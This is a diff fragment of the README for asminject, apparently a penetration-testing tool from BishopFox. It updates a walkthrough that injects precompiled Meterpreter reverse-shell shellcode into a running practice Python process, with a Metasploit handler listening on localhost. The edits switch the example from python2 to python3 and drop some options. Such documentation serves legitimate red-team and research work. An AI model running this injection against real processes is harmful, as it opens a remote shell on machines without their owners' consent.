BishopFox/asminject/README.md

 [*] Started reverse TCP handler on 127.0.0.1:11443
 ```

-In a third terminal, locate the process and inject the Meterpreter payload into it:
+In a third terminal, locate the process and inject the Meterpreter payload into it.
+Note the use of the `--precompiled` option to specify the `lmrt11443` shellcode.

 ```
-# ps auxww | grep python2
+# ps auxww | grep python3

-root     2144475  0.0  0.1  10644  5172 pts/2    S+   15:44   0:00 sudo python2 ./calling_script.py
+root     2144475  0.0  0.1  10644  5172 pts/2    S+   15:44   0:00 sudo python3 practice/python_loop.py
-root     2144476  0.5  0.2  13884  8088 pts/2    S+   15:44   0:00 python2 ./calling_script.py
+root     2144476  0.5  0.2  13884  8088 pts/2    S+   15:44   0:00 python3 practice/python_loop.py

-# python3 ./asminject.py 2144476 asm/x86-64/execute_precompiled.s --relative-offsets relative_offsets-some_machine-libpthread-2.33-2022-05-11-01.txt --stop-method "slow" --precompiled lmrt11443 --debug
+# python3 ./asminject.py 2144476 asm/x86-64/execute_precompiled.s --stop-method "slow" --precompiled lmrt11443

 ...omitted for brevity...
 ```

-In the first terminal, run the *fg* command, and you should see the following pop up in the third terminal:
+You should see the following pop up in the third terminal:

 ```
 [*] Sending stage (3008420 bytes) to 127.0.0.1